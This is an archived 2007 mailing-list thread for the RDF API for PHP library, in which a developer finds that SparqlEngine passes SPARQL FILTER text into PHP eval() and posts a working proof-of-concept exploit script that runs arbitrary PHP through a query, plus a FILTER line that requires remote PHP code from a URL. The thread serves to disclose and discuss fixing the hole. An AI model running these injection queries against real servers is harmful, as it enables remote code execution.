Menu
▾
▴
rdfapi-php-interest
|
From: Christian W. <cw...@cw...> - 2007-01-25 16:33:05
Attachments:
signature.asc
|
Hello, http://sites.wiwiss.fu-berlin.de/suhl/bizer/rdfapi/tutorial/sparqlTestcas= es.htm states that the normale SparqlEngine passes nearly all testcases, regex ones included. When running the unit tests, the test script stops at "regex-query-001" and does nothing further. This is because SparqlEngine supresses errors in eval() on line 706 by prefixing it with "@". When removing it, I get the following error: --------------- Fatal error: Call to undefined function regex() in /data/Studium/Diplomarbeit/rdfapi-php/api/sparql/SparqlEngine.php(706) : eval()'d code on line 1 --------------- This one is very natural since (IMO) there is no regex handling code in the engine. How does it come that the testcase overview page states that it passes all those tests? --=20 Regards/Mit freundlichen Gr=C3=BC=C3=9Fen Christian Weiske |
|
From: Chris B. <ch...@bi...> - 2007-01-25 17:06:13
|
> This one is very natural since (IMO) there is no regex handling code in > the engine. How does it come that the testcase overview page states that > it passes all those tests? Maybe Tobias wanted a better mark for this master thesis ;-) Chris ----- Original Message ----- From: "Christian Weiske" <cw...@cw...> To: <rdf...@li...> Sent: Thursday, January 25, 2007 5:32 PM Subject: [Rdfapi-php-interest] SparqlEngine / regex passes? > ------------------------------------------------------------------------- > Take Surveys. Earn Cash. Influence the Future of IT > Join SourceForge.net's Techsay panel and you'll get the chance to share > your > opinions on IT & business topics through brief surveys - and earn cash > http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV -------------------------------------------------------------------------------- > _______________________________________________ > Rdfapi-php-interest mailing list > Rdf...@li... > https://lists.sourceforge.net/lists/listinfo/rdfapi-php-interest > |
|
From: <tob...@we...> - 2007-01-25 18:49:48
|
Hi Christian. The regex function is evaluated in rdfapi-php\api\sparql\FilterFunctions.php. It works fine for me. Did you change something with the import mechanism so that this file is not imported with the sparql package? Regards Tobias >> This one is very natural since (IMO) there is no regex handling code in >> the engine. How does it come that the testcase overview page states that >> it passes all those tests? >> > > Maybe Tobias wanted a better mark for this master thesis ;-) > > Chris > > > ----- Original Message ----- > From: "Christian Weiske" <cw...@cw...> > To: <rdf...@li...> > Sent: Thursday, January 25, 2007 5:32 PM > Subject: [Rdfapi-php-interest] SparqlEngine / regex passes? > > > >> ------------------------------------------------------------------------- >> Take Surveys. Earn Cash. Influence the Future of IT >> Join SourceForge.net's Techsay panel and you'll get the chance to share >> your >> opinions on IT & business topics through brief surveys - and earn cash >> http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV >> > > > -------------------------------------------------------------------------------- > > > >> _______________________________________________ >> Rdfapi-php-interest mailing list >> Rdf...@li... >> https://lists.sourceforge.net/lists/listinfo/rdfapi-php-interest >> >> > > > ------------------------------------------------------------------------- > Take Surveys. Earn Cash. Influence the Future of IT > Join SourceForge.net's Techsay panel and you'll get the chance to share your > opinions on IT & business topics through brief surveys - and earn cash > http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV > _______________________________________________ > Rdfapi-php-interest mailing list > Rdf...@li... > https://lists.sourceforge.net/lists/listinfo/rdfapi-php-interest > |
|
From: Christian W. <cw...@cw...> - 2007-01-25 22:13:31
Attachments:
signature.asc
|
Tobias,
> The regex function is evaluated in
> rdfapi-php\api\sparql\FilterFunctions.php. It works fine for me. Did yo=
u
> change something with the import mechanism so that this file is not
> imported with the sparql package?
Yes, I did change my imports a bit.
Now that I understand how you did this, I discovered that your eval'ing
code lets someone fully exploit a server that lets you input own sparql
queries:
--------------
SELECT ?a WHERE {
?a ?b ?c .
FILTER mkdir('/home/cweiske/exploit')
}
--------------
You can put anything instead of mkdir, inkl. unlink, sql database access
and everything.
Working demo exploit:
exploit.php:
---------------------
<?php
require_once(dirname(__FILE__) . '/../config.php');
require_once RDFAPI_INCLUDE_DIR . 'RdfAPI.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlParser.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlEngine.php';
$parser =3D new SparqlParser();
$graphset =3D ModelFactory::getDatasetMem('Dataset1');
$def =3D $graphset->getDefaultGraph();
$def ->load(dirname(__FILE__) . '/exploit.n3');
$qs =3D "
SELECT ?a WHERE {
?a ?b ?c .
FILTER mkdir('/home/cweiske/exploit')
}
";
$q =3D $parser->parse($qs);
$engine =3D SparqlEngine::factory();
$t =3D $engine->queryModel($graphset, $q, false);
?>
---------------------
exploit.n3:
---------------------
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
_:alice rdf:type foaf:Person ; .
---------------------
--=20
Regards/Mit freundlichen Gr=FC=DFen
Christian Weiske
|
|
From: <au...@in...> - 2007-01-25 23:13:01
|
Christian Weiske wrote: > Working demo exploit: Good job in detecting the security hole! But I guess it would be more constructive to post a patch to close the hole instead of an exploit ;-) Sören |
|
From: Christian W. <cw...@cw...> - 2007-01-25 23:24:26
Attachments:
signature.asc
|
S=F6ren, > Good job in detecting the security hole! But I guess it would be more > constructive to post a patch to close the hole instead of an exploit ;-= ) The current implementation makes it IMO not possible to close the hole fully. It works the following way: sparql filter string -> some preg replaces -> eval Since there is no state machine/parser in the background which only accepts valid code and drops invalid - all code is used, just some cases like str() or dateTime() are re-formatted - it is not possible to fix it. A total new approach and code would be needed. --=20 Regards/Mit freundlichen Gr=FC=DFen Christian Weiske |
|
From: <au...@in...> - 2007-01-26 00:01:02
|
Christian Weiske wrote:
> The current implementation makes it IMO not possible to close the hole
> fully.
Why not extracting all function-calls from the string and comparing with
an array of allowed functions, e.g.:
preg_match_all('/\s([A-Z0-9_]+)\(/i',$evalstr,$matches);
if(array_diff($matches[1],$allowedFuncs))
// denied function call
I admit a bit quick and dirty (maybe "" enclosed strings should also be
extracted from $evalstr first), but it should work, as I understand the
problem...
Sören
|
|
From: Christian W. <cw...@cw...> - 2007-01-26 05:17:46
Attachments:
signature.asc
|
S=F6ren,
> Why not extracting all function-calls from the string and comparing wit=
h
> an array of allowed functions, e.g.:
>=20
> preg_match_all('/\s([A-Z0-9_]+)\(/i',$evalstr,$matches);
>=20
> if(array_diff($matches[1],$allowedFuncs))
> // denied function call
>=20
> I admit a bit quick and dirty (maybe "" enclosed strings should also be=
> extracted from $evalstr first), but it should work, as I understand the=
> problem...
Beside the q&d touch it also doesn't protect you from using language
constructs instead of function. E.g. require_once is a language
construct and can be called without braces:
> FILTER require "http://some.where/over/the/rainbow.php"
which, together with allow_url_fopen, just cannot be stopped.
Now we might remove another set of hard-coded keywords like require and
include from the string without context, but they also might be valid
strings in a search -> FILTER ?code =3D "require_once".
Point is, there is no way to secure eval(), that's why everyone warns
you from using it. It isn't even (except under very certain conditions)
allowed in PEAR. And, eval is very similar to evil - now you know why :)
--=20
Regards/Mit freundlichen Gr=FC=DFen
Christian Weiske
|
|
From: Christian W. <cw...@cw...> - 2007-01-26 05:54:26
Attachments:
signature.asc
|
> Point is, there is no way to secure eval(), that's why everyone warns > you from using it. It isn't even (except under very certain conditions)= > allowed in PEAR. And, eval is very similar to evil - now you know why := ) I think a security advisory should be posted on the homepage with the "solution" to not allow arbitrary code or to disable sparql at all. --=20 Regards/Mit freundlichen Gr=FC=DFen Christian Weiske |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X